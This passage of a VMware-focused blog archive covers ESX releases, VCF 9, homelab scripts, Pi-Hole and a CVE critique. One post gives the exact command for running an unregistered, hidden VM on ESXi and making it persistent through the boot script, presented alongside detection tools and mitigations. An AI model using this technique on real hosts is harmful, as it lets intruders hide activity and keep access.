by updating ESX. The short of it is that ALL ESXi/ESX and VMware Tools versions are affected by this, and needs to be patched ASAP. --- # VMware Explore on Tour 2025: London URL: https://vNinja.net/2025/07/09/vmware-explore-on-tour-2025-london/ Date: 2025-07-09 Author: christian Tags: VMware Explore, Explore, VMware Explore 2025 Registration for VMware Explore on Tour in London on the 17th and 18th of September 2025 is now live! The Agenda is pretty sparse so far, but I’m sure more details will be available after VMware Explore 2025 in Las Vegas August 25th to the 28th. The determination of which breakout sessions that will be presented in London, is done after the main event in Las Vegas. On the heels of Explore on Tour London, on the 18th, my friends over at VMUG UK is hosting the VMUG UK UserCon at the same location as Explore on Tour (The Hilton Metropole), and it’s great to see several familiar faces on the speaker list. I have been lucky enough to have a session accepted, so I will be present at both events. My session, vSphere: It’s All Fun and Games Until Someone Gets Root is scheduled at Thursday the 18th at 5:15 PM, and I hope I see you there! Even if you’re not attending VMware Explore on Tour in London, you can still attend the VMUG UK UserCon free of charge, just make sure you register for the event. This should be a lot of fun! --- # vSphere 8: Error Installing HA components failed URL: https://vNinja.net/2025/07/09/error-installing-ha-components-failed-vsphere-8/ Date: 2025-07-09 Author: christian Tags: VMware, vSphere, ESXi Errors when enabling vSphere High Availability (HA) in a cluster # Enabling vSphere HA in my homelab resulted in the following errors being displayed in my vCenter Web Client: Cannot complete the configuration of the vSphere HA agent on the host. "Applying HA VIBs on the cluster encountered a failure". Failed installing HA component on the host: host-34 An internal error occurred while staging/remediating the host. A general system error occurred: Installing HA components failed on the cluster: domain-c8 A quick search returned Configuring vSphere HA on an image-based cluster fails (384913) but that didn’t quite sit right with me, since HA was previously enabled on this cluster, and no changes had been done to the image based vLCM setup I use. The only change I had done, was to remove a host that had failed from the cluster. As part of the process of removing the failed host, I had also tried to mount the local NVMe device from the failed host to the host HA had issues with enabling the HA Agent on. Then it dawned on me, when mounting the NVMe device I had stopped the USB Arbitrator service on the host in question, on order to mount the NVMe drive via an USB enclosure. Logging back into the host via SSH and restarting the service with /etc/init.d/usbarbitrator start solved the issue, and I could enable HA again on the cluster without issues. TL;DR # The USB Arbitrator service not running on an ESXi host causes issues when enabling vSphere HA for a cluster. --- # ESX to ESXi and Back Again URL: https://vNinja.net/2025/06/18/esx-to-esxi-and-back-again/ Date: 2025-06-18 Author: christian Tags: VMware, VCF, VVF, ESX, ESXi With the release of VMware Cloud Foundation 9, Broadcom has reverted the name of the hypervisor back to ESX removing the ESXi name that was introduced with ESXi 4.1, when the old service console was removed. I don’t know why the change was made back to the original ESX naming, but the i was supposed to indicate that it was the “integrated” version without the service console. The service console has not been added back in ESX 9, but the name has been changed back to the original. Goodbye ESXi, it was a good 15 year run! Version naming and initial release year # Version Release Date ESX 1.0 2001 ESX 2.0 2003 ESX 2.1 2004 ESX 2.5 2005 ESX 3.0 2006 ESX 3.5 2007 ESX 4.0 2009 ESXi 4.1 2010 ESXi 5.0 2011 ESXi 5.1 2012 ESXi 5.5 2014 ESXi 6.0 2015 ESXi 6.5 2016 ESXi 6.7 2018 ESXi 7.0 2020 ESXi 8.0 2022 ESX 9.0 2025 Note: Version 3.5 and 4.0 was also available as ESXi editions, but 4.1 was the first release that only had ESXi as an option All the documentation for VCF 9 references ESX, even for older versions which was named ESXi at the time of release. For more detailed information about all the releases and versions, check virten.net: VMware ESX Release and Build Number History VMware ESXi Release and Build Number History --- # VCF / VVF 9 Deprecation Notices URL: https://vNinja.net/2025/06/18/vcf9-deprecation-notices/ Date: 2025-06-18 Author: christian Tags: VMware, VCF, VVF While new features and enhancements are always exciting, new releases often also come with deprecation notices and end of support notices for features that were previously available, and those might also have a huge impact on a deployment. That is also the case for VCF 9 / VVF 9, and they are highlighted in the Release Notes for VCF 9 under Product Support Notes. A few of these warrant a closer look, and here are some examples that caught my attention. This is not a complete list, check the Product Support Notes if any of these apply to your environment. vSphere # ESX # Deprecation of vSphere Auto Deploy Auto Deploy via PXE is being deprecated and will be removed in a future release Deprecation of legacy log file formatting and deprecation of vmware.log and vmsyslogd message formats This one is interesting, especially since my colleage Espen Ødegaard posted Troubleshooting syslog from VMware ESXi 8 U2 IA and missing STRUCTURED-DATA using RFC5424-based syslog nearly two years ago. Hopefully the new logging format will adhere to the RFC. Removal of the internal runtime option execInstalledOnly Good! It was way to easy to turn off execInstalledOnly when logged into ESX, rendering the runtime option a bit useless. The runtime option is now removed, and the boot option is on by default. Anders Olsson has a great article explaining what this is, and how it works: VMware ESXi 8.0 and execInstalledOnly – The Good, the Bad and the Ugly. vCenter # Deprecation of vSphere Virtual Volumes This is a big one! vVols are being deprecated and will be removed in future releases. Support will continue for critical bug fixes only, and only in vSphere 8.x and VCF 5.2. Deprecation of vCenter Enhanced Linked Mode (ELM) VCF 9 does not use ELM to connect vCenters into a single sign-on domain. Support in v9 is only there to enable upgrades from existing environments to VCF 9, but in VCF 9 grouping in VCF Operations is the unified management method across vCenters. Deprecation of vSphere Host Profiles Not really new, but worth noting. Host Profiles has been replaced by vSphere Configuration Profiles. VMware Update Manager Download Service (UMDS) becomes part of the VMware Cloud Foundation Download Tool UMDS has been moved into the VCF Download tool, and will no longer be a standalone tool. Removal of vSphere Lifecycle Manager baselines Also previously announced, vLCM Baselines (Legagy VUM workflows) are no longer supported, Image based configuration in vLCM is the way to go. vSAN # Deprecation of the hybrid configuration in vSAN Original Storage Architecture (OSA) vSAN OSA Hybrid Mode has been deprecated, and it was about time too. I’ve not seen any hybrid implementations of vSAN the last 4 or 5 years, and the time for it has passed. As mentioned, there are more notices in the official documentation. Make sure to read through those before starting to implement VCF/VVF9, so you don’t get any surprises moving forward. --- # VCF 9.0 Is Here — What Does That Mean? URL: https://vNinja.net/2025/06/17/vcf9-is-here-what-does-that-mean/ Date: 2025-06-17 Author: christian Tags: VMware, VCF, VVF Broadcom released VMware Cloud Foundation 9 (VCF) into the world today. The News Release goes over the broad strokes, and lots of others have already posted about the release so I won’t go into detail on all of it: Maarten Van Driessen — VCF 9 - News and Thoughts Don Horrox — Announced Features for VCF 9 Edd Watton — A First Look at VMware Cloud Foundation 9 VMware by Broadcom What’s New in VMware Cloud Foundation 9.0 Focus Change # The main focus in Broadcoms annoncement is that this is the realization of the “Modern Private Cloud”. The focus has switched from being everything, everywhere to everyone, aka the old VMware Multi-Cloud vision, to a clear focus on Private Cloud — and Private Cloud only. This release also aligns all the products in the VCF (and vSphere Foundation (VVF)) stack into one product with a set of features, instead of a set of products combined into a “release”. If you want to get a look at what’s new in an interactive format, there is an Hands-on Lab available: What’s New in VMware Cloud Foundation 9.0 - Operations (HOL-2610-03-VCF-L) What is included in VCF and VVF 9? # Bill of Materials # VMware Cloud Foundation Component VMware vSphere Foundation Component Build Number VCF Installer Yes 24755599 VMware ESX Yes 24755599 VMware vCenter Yes 24755599 VMware vSAN ESA Witness Yes 24755599 VMware vSAN File Services Yes 24755599 VMware vSAN OSA Witness Yes 24755599 VMware NSX No 24755599 SDDC Manager Yes 24755599 VMware Cloud Foundation Operations Yes 24755599 VMware Cloud Foundation Operations orchestrator Yes 24755599 VMware Cloud Foundation Operations collector Yes 24755599 VMware Cloud Foundation Operations fleet management No 24755599 VMware Cloud Foundation Operations for logs Yes 24755599 VMware Cloud Foundation Operations for networks No 24755599 VMware Cloud Foundation Operations HCX No 24755599 VMware Cloud Foundation Automation No 24755599 VMware vSphere Supervisor Yes 24755599 VMware Kubernetes Backup & Recovery Service Yes 24755599 VMware vSphere Kubernetes Service Yes 24755599 VMware Remote Console Yes 24755599 VMware Tools Async Release Yes 24755599 VMware Cloud Foundation Download Tool Yes 24755599 VMware Cloud Foundation Operations Identity Broker No 24755599 Notice that the build numbers are now uniform for all the components! (I wonder how that’s egoing to be handled going forward, when something needs to be patched. Also, I have a feeling that VMware Tools Async Release might not have that build number for long). ESX is back! Based on the BOM, it’s now VMware ESX (again) and not ESXi any more! Initial Highlights # Of course, all of the different components have their own set of new features, but going through all of them is something for future posts once I have some real experience with deploying them in production environments. There are, however, a few things I would like to highlight: Unified Installer # A welcome enhancement is a unified installer for both VCF and VVF: Install ESX, deploy the installer appliance select your edition (VCF or VVF) and get a automated installation of vCenter and other components. Nice! Licensing # Another welcome change is how licenses are managed in VCF 9. While licenses has been a contentious topic since the Broadcom acquisition of VMware, there is finally a welcome change. There is now a single license file that covers the entire environment, and management of those has been moved to Operations. See Easy Licensing Has Arrived with VCF 9.0 — And It’s About Time! by Christopher Kusek for more details. Final Thoughts # VCF 9 shows that VCF has finally grown up into a proper product of it’s own. This is a welcome change, and should help drive adoption. Initial bring-up and management is simplified, and I really like the unified deployment model for both VCF and VVF. I like how Operations now will take center stage, something that’s natural since it’s included in both the VCF and VVF license. All in all, looking at the enhancements and changes that are being done, I like what I see. A refocused VMware (by Broadcom) delivering what they know best in a coherent and streamlined fashion is refreshing, and a welcome change. We’ve had a long time now with uncertainty and changes that might not have been well communicated or understood, finally there’s something that makes perfect sense in a bigger picture. Lastly I want to touch on something that might be overlooked as VCF 9 is released; What about the other licensing bundles, like vSphere Enterprise Plus (VSEP) and vSphere Standard (VVS)? Of course, these now get vSphere 9 (ESX and vCenter), but where do they fit into Broadcoms focus on Private Cloud? My feeling is that they don’t. I will not be surprised that somewhere down the line, both VSEP and VVS will be dropped as licensing options, leaving customers with the choice of VVF or VCF only if they want to continue using VMware products. In the end, I think VVF will disappear as well, leaving VCF as the only option. Like it or not, that’s where I think we’re headed — just not right away. Updates # Note: Added June 18th 2025 With licensing management being moved to Operations in VCF and VVF, and the new unified licensing scheme, how are licenses handled in VSEP and VVS? For me that’s not clear based on the new release documentation that doesn’t mention VSEP or VVS at all. Second addition: Note: Added June 18th 2025 Based on the information in VMware vSphere Product Line Comparison, it seems VSEP and VVS are being left behind (at least for now): Note that vSphere Standard and vSphere Enterprise Plus are only available as versions up to the 8 Update 3 release. Currently, vSphere 9.0 features are only available as part of VMware vSphere Foundation 9.0 and VMware Cloud Foundation 9.0. Hat tip to Stephen Wagner for pointing that out. --- # phpIPAM to Homepage URL: https://vNinja.net/2025/01/22/phpipam-to-homepage/ Date: 2025-01-22 Author: christian Tags: PowerShell, Container, Open Source, Lab, Homepage I recently set up Homepage which offers an application/service dashboard for my resources. For a small home lab this works well, and it is very handy to have an easy to access dashboard like this available. It offers integration and widgets for a whole slew of services like Plex, Uptime Kuma and Synology. It even has native icmp based monitoring built in. All in all, it’s pretty slick! Homepage is fairly easy to set up, and configure, but it requires editing of .yaml files which it uses to render the dashboard. For small environments, like my home network, that’s not really a problem, but for larger, shared, environments maintaining these .yaml files manually gets messy over time. My shared work lab is one of these environments — but I still wanted to see if we could use Homepage as a dynamically updated, simple dashboard for the available services in that environment. Luckily we use phpIPAM for IP address management and discovery, and it has an API we can use. Enter phpIPAM to Homepage # Of course, this is designed for our specific use case, but in case someone else is looking to automate Homepage .yaml file generation, this could be a good starting point. phpIPAM to Homepage is a PowerShell script that does the following: Connect to the phpIPAM API Grab all valid hostnames from all subnets Iterate through all the hostnames, and scan them with nmap Create a services.yaml file for Homepage for all hosts that respond on any of the following ports: 22 (ssh) | 80 (http) | 443 (https) | 3389 (rdp). If a given host responds to more than one of these ports, add an entry for each port with a corresponding URI scheme link. The services.yaml file includes specific icons for each of the services discovered, as well as naming convention that also indicates which port has been discovered (e.g. hostname:port) It does, at least not currently, create any fancy Homepage dashboards. All it does is create a very simple list of hosts with links to them. Sample services.yaml output # - Discovered Hosts: - hostname1.example.com:22: href: ssh://hostname1.example.com icon: mdi-ssh - hostname2.example.com:443: href: https://hostname2.example.com icon: mdi-web - hostname2.example.com:80: href: http://hostname2.example.com icon: mdi-web - hostname3.example.com:3389: href: rdp://hostname3.example.com icon: mdi-remote-desktop Screenshot # It can be run standalone as a PowerShell script, or as we use it in our lab environment as a single purpose container that runs, creates the .yaml file and exits as soon as it’s done. This way we can schedule the container to run when we want it to, and it doesn’t take up any resources when it’s not active. For installation, configuration, and a ready to use Alpine Linux container, check phpIPAMtoHomepage on GitHub. --- # Seamless Home Assistant NFC Automations on iPhone URL: https://vNinja.net/2025/01/02/nfc-tags-iphone-home-assistant/ Date: 2025-01-02 Author: christian Tags: Home Assistant, Home Automation Home Assistant has the ability to read and write NFC tags via the Companion App but using this on an iPhone is a bit cumbersome as Apple doesn’t allow that apps read NFC tags and do an action without a confirmation from the user. This default setting makes sense, as I don’t want random NFC’s triggering events on my phone, but there is no way of overriding this behaviour even for known tags — which sometimes defeats the purpose of having NFC tags automate actions and events in Home Assistant. How to Create Seamless NFC Home Assistant Automations on an iPhone # It also seems that NFC tags written by Home Assistant Companion App includes information about app itself, these tags will always trigger a confirmation. Luckily there is a way to work around this, by using the iOS Shortcuts App. Simply put, iOS Shortcuts can trigger an action in Home Assistant just by scanning an NFC tag, as long as you have the Companion App installed. Creating a generic NFC tag with Simply NFC # In order to do this NFC Tags needs to be written outside of Home Assistant, I have used Simply NFC with good results. Shortcuts only needs to be able to read a tag id and that’s it, and Simply NFC makes it to do so. The only requirement for writing to a tag, is to add a record to it — and this can be anything, for instance just a text string Once that’s done, write it to the NFC. Creating an iOS Shortcut to Trigger HA Events # Once you have a generic NFC written, create an iOS shortcut that triggers and action (or something else) within Home Assistant. Open up Shortcuts on the iPhone. Click on the + in the top right corner, and scroll down to NFC and click it. Select Run Immediately, if you don’t want to have to confirm the action when the NFC tag is scanned. Click on Scan and scan the NFC tag, and give it a name in the Name This Tag window that pops up. Click on Next in the top right corner and select New Blank Automation on the next screen. Scroll down to find Home Assistant and look for your preferred action. In this example I am just controlling a light, so I’ve chosen Control Light and selected a light for the automation. I’ve also set it to Toggle so I can use the same tag to turn the light on or off. Click on Done and that’s it. The next time your iPhone reads the NFC tag, the chosen action will trigger without any confirmation required. You could also have Shotcuts trigger a web hook in Home Assistant, but that’s a less secure way of triggering actions as it doesn’t require any form of authentication in Home Assistant unlike doing it through the companion app that requires authentication in the app itself. The same method can be used to trigger more advanced scenarios in Home Assistant, like scenes or run actions. It can also be used to trigger anything that the Shortcuts app can automate, without involving Home Assistant at all. --- # Ghostty — Workaround for Missing or Unsuitable Terminal xterm-ghostty URL: https://vNinja.net/2024/12/28/ghostty-workaround-for-missing-or-unsuitable-terminal-xterm-ghostty/ Date: 2024-12-28 Author: christian Tags: zsh, terminal emulator, Ghostty The freshly made public Ghostty terminal emulator by Mitchell Hashimoto (co-founder of Hashicorp) is all the rage at the moment, and it definitely looks interesting: Ghostty is a terminal emulator that differentiates itself by being fast, feature-rich, and native. While there are many excellent terminal emulators available, they all force you to choose between speed, features, or native UIs. Ghostty provides all three. I decided to give it a spin on my Macbook, and see if it offers any improvements over Wezterm, which is my current terminal emulator of choice. So far so good, it seems to work very well and offers quite a few customization options. Also worth noting is ghostty.zerebos.com that offers a Ghostty config tool. The first real issue I had with it, was when using SSH to connect to remote resources. This produced the missing or unsuitable terminal: xterm-ghostty error message, because the remote resource doesn’t have the xterm-ghostty terminfo defined. The official Ghostty docs has some workarounds for it, but these are either to convoluted like copying terminfo entries to all remote systems, or setting SetEnv TERM=xterm-256color in .ssh/config for each remote host. The other alternative is to set SetEnv TERM=xterm-256color system wide but that also affects other terminal emulators (as does setting it in .ssh/config) Workaround # My workaround for it, is to set the TERM variable in my .zsrc file, but only if Ghostty is the terminal emulator in use (as Wezterm doesn’t have this issue). This way I don’t have to do it for every remote host, or copy terminfo for Ghostty to them. This is simple do to, as the $TERM_PROGRAM variable contains the name of the emulator currently in use. Add the following to your .zsrc file, and the TERM=xterm-256color variable declaration is only done when .zsrc is processed in Ghostty and not in other terminal emulators. if [[ "$TERM_PROGRAM" == "ghostty" ]]; then export TERM=xterm-256color fi Update Update 16th of September 2025: Ghostty v1.2.0 has been released, which works around this problem. PR: #7608 SSH Improvements (Work-in-Progress) introduces the ability to set shell-integration-features = ssh-env,ssh-terminfo in the Ghostty config file. ssh-env sets environment compatibility, and ssh-terminfo installs the required terminfo on the remote host. This removes the need for the workaround above. See the release notes for details. --- # Beware Of The Rogue VMs! URL: https://vNinja.net/2024/11/11/beware-of-the-rogue-vms/ Date: 2024-11-11 Author: christian Tags: vSphere, ESXi, vCenter, VMware, Security At this years VMware Explore 2024 in Barcelona, I did a presentation called “CMTY1321BCN: Beware Of The Rogue VMs!”, a recording of the session is also available on the VMware Explore 2024 Community YouTube channel. Here is a quick text based recap of it. What are Rouge VMs? # First off, we need to define what a Rougue VM is. In short, a rougue VM is a VM that runs on an ESXi host, but you don’t really know that it’s running. It is not shown in ESXi Host Client, or in the vSphere Web Client. Back in January 2024 MITRE’s Networked Experimentation, Research, and Virtualization Environment (NERVE) was compromised through a series of vulnerabilities. They have written a detailed post-mortem of it that highlights all the details, but in short the attackers were able to inject their own VMs into the environment. VMs that don’t show up using the “normal” administration interfaces. How are Rogue VMs created? # This is surprisingly easy to do. If someone has SSH and root access to an ESXi host, all that is required is to place a valid VM on an available datastore, edit the .vmx file to connect it to a valid network and run the following command: /bin/vmx -x /vmfs/volumes/volname/vmname/vmname.vmx 2>/dev/null 0>/dev/null & This commands starts the VM, without registering it in the inventory (which is why it doesn’t show up in the ESXi Host Client, og the vCenter Web Client) and sends the output to /dev/null. This VM then runs as a normal VM, but hidden. The vim-cmd vmsvc/getallvms (documentation) command will not show this VM, as that command queries the host inventory. esxcli vm process list (documentation) however, will show it, as it shows all the running VMs on the host, regardless of registration status. How are Rogue VMs Made Persistent? # When an ESXi host boots /etc/rc.local.d/local.sh is run, so making these VMs persistent once they are placed on an ESXi host is as simple as adding the vmx command above to it. Once that is done, the Rogue VM will autostart when the host reboots, still undetectable in the usual admin interfaces. Identifying Rogue VMs # There are a couple of available resources that will help identify Rogue VMs in an environment. Invoke-HiddenVMQuery by MITRE (PowerCLI) VirtualGHOST by Crowdstrike (PowerCLI) RVTools In the RVTools vHealth tab, VMs located on a Datastore, that are not registered with the inventory, are identified as “Possibly a Zombie VM!” Rogue VM Mitigation Strategies # Always keep vCenter and ESXi hosts patched DO NOT enable SSH on your ESXi hosts (or vCenter) “Everything” can be done through vCenter/Host Client/APIs anyway, there are few real world use cases when SSH needs to be enabled at all Open SSH only when required, and close after use Monitor ESXi logs for SSH enablement and logins, and look for these events: /var/log/shell.log SSH[ID]: SSH login enabled shell[ID]: Interactive shell session started var/log/auth.log sshd[ID]: FIPS mode initialized Use Secure Boot Secure Boot prohibits /etc/rc.local.d/local.sh from running on boot, this preventing perseverance Of course, if someone has SSH and root access to your ESXi hosts, all bets are off anyway as they can pretty much to whatever they want. Make sure this is limited to only being available when absolutely required and please practice safe ESXi! --- # Rickrolling WiFi at VMware Explore Barcelona 2024 URL: https://vNinja.net/2024/11/08/rickrolling-wifi-at-vmware-explore-barcelona-2024/ Date: 2024-11-08 Author: christian Tags: WiFi, VMware Explore, ESP32 This last week I attended VMware Explore 2024 in Barcelona. While at was at the conference, I had a small ESP32 board with an external antenna in my backpack, connected to a powerbank. The sole purpose of this little device, was to provide some fun random WiFI SSID’s, and to see if anyone actually connected to it. ESP32 in its little 3D printed box All it did was to cycle through all the lyrics of Rick Astley - Never Gonna Give You Up, and if someone connected to it, show a captive portal that had an ASCII drawing of Rick Astley on it, and the following text: You can blame this on @h0bbel Have fun, be excellent! It then logged the connection in a logfile om the ESP32 itself. No client details were logged, only that a connection was made and a timestamp based on milliseconds since the ESP32 was powered on. Now, after running it from Monday to Wednesday at the Fira, the results are in, and all in all there were 63 connections made to my little device. Day 1 had 33 connections, day two had 25 and the last day only 5. Make of that what you will, but obviously I did get to Rickroll someone at the conference! If you were one of them, reach out — I’d love to hear from you! The source code for this little ESP32 experiment is available on GitHub: ESP32 --- # GL-iNet Opal (GL-SFT1200) Travel Router: First Impressions URL: https://vNinja.net/2024/08/25/gl-inet-opal-travel-router-first-impressions/ Date: 2024-08-25 Author: christian Tags: GL-iNet, Networking, DNS, WireGuard, Opal For a while now I’ve been looking at travel routers, in order to have something small, light, and portable I can bring with me wherever I go. In my case, there are a couple of distinct use cases for such a device. I was looking for something that could piggyback to an existing WiFi and create a new WiFi network behind it, and also have a physical Ethernet option. Bonus points if it could also tether to my phone and use its connection if required, either via a physical connection or WiFi sharing. 1. Security # This is my main use case, and the primary reason why I was looking into travel routers to begin with. I want to ensure that I run connections over (my home) WireGuard VPN as much as possible. I run Pi-Hole at home, and having the same DNS filtering and security when travelling is very nice. If I’m not connected through VPN, I also want to make sure that I run DNS over TLS to protect my devices from DNS spoofing when connecting to WiFi hotspots offered in cafés, hotels and so on. 2. Multiple-device support # Some times when I travel, especially when going on longer holidays, I bring my Apple TV with me. Having a local and secured WiFi with VPN connectivity ensures that the Apple TV can connect, and use my home network as it’s internet breakout — regardless of the actual physical location. GL-iNet Opal (GL-SFT1200) Travel Router # After some research, I ended up purchasing a GL-iNet Opal (GL-SFT1200) Travel Router. The device seems to tick all the boxes for my requirements, including WireGuard and DNS encryption (it also supports OpenVPN and several other commercial VPN providers). It comes in a very small (118 x 85 x 30mm / 145g) package, powered via USB-C. Handy! The initial setup was really quick, easy, and very straight forward. Connecting the built-in WireGuard client to my existing WireGuard server was also a simple matter of configuring it. The WireGuard VPN throughput is limited (Max. 65Mbps) but more than enough for my current needs, and if it turns out I need to have more bandwith later, I can upgrade to one of the larger models then. It also supports sharing an isolated Guest WiFI, that allows me to share my WiFi with others, without that traffic being routed through my VPN (based on the VLAN) That allows sharing of my connection, without worrying about the clients connecting to anything else besides the internet as well as isolating those clients from each other. That’s the current setup I have, one “Private WiFi” for my own VPN-secured connections and one “Guest WiFi” for other devices/people. Conclusion # All in all, I am impressed so far. I have tested connecting it to WiFis with captive portals which seems to work just fine. Tethering to my phone also looks to work perfectly (bonus points!). I have not tested this yet, but it’s power draw of <6W should also make it quite possible to power it via a power bank in my backpack, if required. The Opal runs on a custom version of OpenWRT, albeit an older old 18.06 version, so there are pretty much endless possibilities as far as configuration goes. I will come back with a more detailed review once I’ve used it for an extended period of time, as well as some details on my configuration and setup. --- # My Updated Pi-Hole Setup URL: https://vNinja.net/2024/08/10/my-updated-pi-hole-setup/ Date: 2024-08-10 Author: christian Tags: Pi-Hole, DNS Back in 2018 I outlined My Pi-Hole Setup and while the setup is still mostly the same some things have naturally evolved from there. That being said, Pi-Hole has been rock solid for all these years, and is still my main go-to for blocking ads and trackers from my home network devices. Since that post from 2018, I have done a few changes. 1. Multi-Instance Pi-Hole # I now run a multi-instance Pi-Hole setup, based on Gravity Sync. Basically Gravity Sync ensures that my two instances block lists are synced. This has worked very well for quite a long time, but Gravity Sync has now been retired by the author. It should continue to work until Pi-Hole v6 is released. I will have to cross that bridge when I get to it, I guess. Perhaps that will be a good time to move over to running Pi-Hole in containers, istead of VMs. 2. Auto-updating Pi-Hole # My Pi-Hole instances auto-update via a simple cron job. Once every 24h it runs pihole -up. This has worked flawlessly for a couple of years now, but I anticipate that there might very well be issues when Pi-Hole v6 is released. 0 6 * * * pihole -up 3. Use Unbound as recursive DNS for DNSSEC and DNS over TLS (DoT) support # My Pi-Hole instances now forward requests to Unbound. The setup I use is documented in Setting up Pi-hole as a recursive DNS server solution, and works well out of the box. The setup ensures DNSSEC support, for greater security. If you want to test your DNSSEC status, check DNSSEC Resolver Test or dnscheck.tools/. I have also added DNS over TLS (DoT) configuration to Unbound, by adding the following to /etc/unbound/unbound.conf.d/pi-hole.conf: tls-cert-bundle: /etc/ssl/certs/ca-certificates.crt forward-zone: name: "." forward-addr: 1.1.1.1@853#cloudflare-dns.com forward-addr: 1.0.0.1@853#cloudflare-dns.com forward-ssl-upstream: yes Cloudflare has a good test for DNS over TLS (DoT) and DNS over HTTPS (DoH) available on 1.1.1.1/help Of course, I still run Conditional Forwarding in Pi-Hole for local DNS lookups, which happens before Pi-Hole sends queries to Unbound and out of my network. All in all, it still works mostly the same as it did when I initially set it up, but now it has some added security which I am very happy with. --- # Driver Issues When Updating VMware ESXi With vLCM Images URL: https://vNinja.net/2024/08/05/driver_issues_when_updating_vmware_esxi_with_vlcm_images/ Date: 2024-08-05 Author: stine Tags: VMware, vCenter, vSphere, vLCM Since baselines are deprecated in vSphere version 8 and baselines are restricted to only VMware-provided content after ESXi 7.0.3 Update P I helped one of my customers to move over to image based updating via vLCM. This has not gone by without any issues as mentioned in my previous post. This time I was updating a 7.0.3 installation of ESXi to Update Q and got stuck on a driver issue that I had not seen before: “Downgrades of manually added component Mellanox Native OFED ConnectX-3 Drivers (3.19.70.1) in the desired ESXi version are not supported”. From a quick Google search I realized I was not the only one who had issues with this driver and figured out I had to downgrade it. Firstly, I checked if the Mellanox card was in use by checking both the hardware in iDRAC (since this is a Dell server) and I also looked through the hardware tab in ESXi. Luckily, the card was not in use and I manually removed it and updated the host using images after. In case anyone else has this problem, this is the way to solve it: Place the host in Maintenance Mode Log onto your host using root credentials over SSH. Run this command: “esxcli software vib remove -n nmlx5-core -n nmlx5-rdma -n nmlx4-core -n nmlx4-en -n nmlx4-rdma” The expected output is: The update completed successfully, but the system needs to be rebooted for the changes to be effective. Reboot Required: true VIBs Installed: VIBs Removed: MEL_bootbank_nmlx4-core_3.19.70.1-1OEM.670.0.0.8169922, MEL_bootbank_nmlx4-en_3.19.70.1-1OEM.670.0.0.8169922, MEL_bootbank_nmlx4-rdma_3.19.70.1-1OEM.670.0.0.8169922, MEL_bootbank_nmlx5-core_4.19.70.1-1OEM.700.1.0.15525992, MEL_bootbank_nmlx5-rdma_4.19.70.1-1OEM.700.1.0.15525992 VIBs Skipped: Your next and final step is to reboot the host. Either from the SSH command line using the command “reboot” or from the GUI. Proceed updating your host with your image via vLCM. Hope this can help anyone out there who get stuck on the same thing! --- # VMware Explore 2024 Barcelona Content Catalog Is Now Live URL: https://vNinja.net/2024/07/31/vmware-explore-2024-barcelona-content-catalog-is-live/ Date: 2024-07-31 Author: christian Tags: VMware, Explore, VMware Explore 2024 The content catalog for VMware Explore 2024 Barcelona (4 - 7 November) is now live! Scheduling will open on the 24th of September 2024, but you can start favouriting sessions now for easy access. As in 2023, I have been lucky enough to have a couple of sessions accepted: Beware Of The Rogue VMs! [CMTY1321BCN] # Description: Do you have Rogue VMs in your vSphere environment? No? Are you sure? Recent security breaches has highlighted how attackers use rogue VMs to hide their activity in a vSphere environment. In this session I’ll show how those VMs can be created, how they are made persistent and how they remain hidden in an environment. I will also walk through how these VMs can be detected, and how to prevent attackers from creating them in the first place. Tracks: Cloud Infrastructure Session Type: Community Quick Talk Level: Technical 200 Products: VMware Cloud Foundation, VMware vSphere Foundation Audience: IT Practitioner How I Went NUTs With PowerCLI — Building a UPS Shutdown Solution [CODE1322BCN] # Description: This session walks through how I built a Network UPS Tools (NUT) solution, with PowerCLI, to shut down my home lab environment when required. The solution consists of PowerCLI Core in a container, combined with Pode, which provides a REST API that NUT uses to manage shutdown events. Tracks: Cloud Infrastructure Session Type: VMware {code} Level: Technical 200 Products: VMware Cloud Foundation, VMware vSphere Foundation Audience: IT Practitioner --- # vCenter Upgrade 8.0 U3a vSphere Lifecycle Manager Port Issues URL: https://vNinja.net/2024/07/30/vcenter-upgrade-8.0u3a-vsphere-lifecycle-manager-port-issues/ Date: 2024-07-30 Author: stine Tags: VMware, vCenter, vSphere, vLCM I was updating one of my customer’s environment to vCenter 8.0 Update 3a today and was from the old vSphere Update Manager Baselines over to image based updating via vSphere Lifecycle Manager (vLCM), but the compliance check stopped at 30% for some reason. I had a look through lifecycle.log and found several timeout errors. It turns out that vCenter 8.0 Update 3a changes how vSphere Lifecycle Manager downloads updates for ESXi hosts and if port 9087 is not open between the ESXi hosts and vCenter it fails. This is documented in the release notes for vCenter 8.0 Update 3, but is very easily missed. Therefore, if you have issues with the compliance check make sure that port 9087 is open between the ESXi hosts and vCenter. --- # VMware vSphere CVE-2024-37085 - A Nothing Burger URL: https://vNinja.net/2024/07/29/vmware-vsphere-cve-2024-37085/ Date: 2024-07-29 Author: christian Tags: VMware, Broadcom, Security Microsoft has caused some noise today with CVE-2024-37085, which explains a well known feature in vSphere. A feature that has been available since vSphere 5.1 came out in September 2012 (no, that is not a typo, it is in fact 12 years old). The feature in question is that if an ESXi host is joined to an Active Directory domain, it will by default look for an AD group called ESX Admins and grants every member of that group root access to the host (via the Web Client, not via SSH). While I happily agree that this isn’t a very good idea, it is also very well documented and explained both in the VMware vSphere documentation, and is also specifically called out in the vSphere Hardening Guides (esxi-8.ad-enable: Use Active Directory for ESXi user authentication), as well as in STIG (V-256404). ESXi hosts are not added to Active Directory by default, so for installations where this has not been specifically configured, this is not an issue at all. The general advice is to NOT join ESXi hosts to Active Directory, as there are near to zero valid use cases for it. In order to exploit this feature for nefarious reasons, like the ones Microsoft hightlights, a number of prerequisites need to be in place: a) Root access to the ESXi host(s) and a user account that can join it to AD, and create a ESX Admins AD Security group or change the advanced setting Config.HostAgent.plugins.hostsvc.esxAdminsGroup on the host to use some other security group from AD. or b) The host(s) needs to be AD domain-joined already and you have AD permissions to add a user account to either an existing ESX Admins Security group (or create a new one if it doesn’t already exist). So, to be perfectly clear, you either need root access to the ESXi host(s) in question or permissions in Active Directory to be able to exploit this. And if you have ESXi root access already, why would you go to the trouble of adding an ESXi host to the domain? As Melissa said: Like are we missing the part where the threat actors have ad? Game over anyway. — vmiss (@vmiss33) July 29, 2024 This behaviour is only the case when joining ESXi hosts to an Active Directory domain, and does not in any include joining VMware vCenter systems to Active Directory. vCenter does not look for, or utilize the ESX Admins Security group. I am glad this feature is being removed by VMware by Broadcom, as it really serves no purpose any more, but to call this a security bypass vulnerability is taking it to far. It’s a feature, that works as intended and is documented with existing advisories and mitigation routines. How that warrants an official CVE is beyond my comprehension. So I guess congratulations are in order Microsoft, you have read the official VMware documentation! Kudos! Update 30th July 2024 cyberscoop.com picked up this blog post, and asked Microsoft for comments. Read about it in Microsoft calls out apparent ESXi vulnerability that some researchers say is a ‘nothing burger’ --- # 